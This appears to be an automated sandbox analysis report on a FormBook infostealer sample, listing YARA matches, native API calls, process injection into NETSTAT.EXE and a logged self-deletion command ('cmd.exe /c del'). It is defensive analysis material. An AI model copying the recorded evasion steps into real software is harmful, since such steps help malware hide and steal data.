          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: NETSTAT.EXE, 0000000B.00000002.602127128.000000000365F000.00000004.00000001.sdmpString found in binary or memory: http://www.spontaneoushomeschooler.com/
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00419F82 NtCreateFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9560 NtWriteFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016EAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016EB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016EA770 NtOpenThread,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016EA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016EA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044A060 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00449F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00449FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00449F82 NtCreateFile,
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041E1F6
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041EBD7
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041E461
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041EC27
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00409E3B
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041E7D7
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041E7DA
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01771D55
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A0D20
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AF900
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BD5E0
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761002
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B841F
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BB090
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DEBB0
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D32EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D322AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C86E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D31FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D32B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D320A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D31D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D32D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C60D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044E1F6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044E461
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00432D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00432D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00439E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00439E3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044E7DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00432FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02C6B150 appears 35 times
          Source: C:\Users\user\Desktop\in.exeCode function: String function: 016AB150 appears 32 times
          Source: C:\Users\user\Desktop\in.exeCode function: String function: 00B47C9A appears 60 times
          Source: in.exe, 00000001.00000003.250265287.000000001ACCF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs in.exe
          Source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs in.exe
          Source: in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs in.exe
          Source: in.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@6/4
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
          Source: in.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\in.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: in.exeVirustotal: Detection: 46%
          Source: C:\Users\user\Desktop\in.exeFile read: C:\Users\user\Desktop\in.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\in.exeProcess created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: in.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: netstat.pdb source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: in.exe, 00000001.00000003.250116639.000000001ABB0000.00000004.00000001.sdmp, in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.600753548.0000000002D5F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: in.exe, NETSTAT.EXE
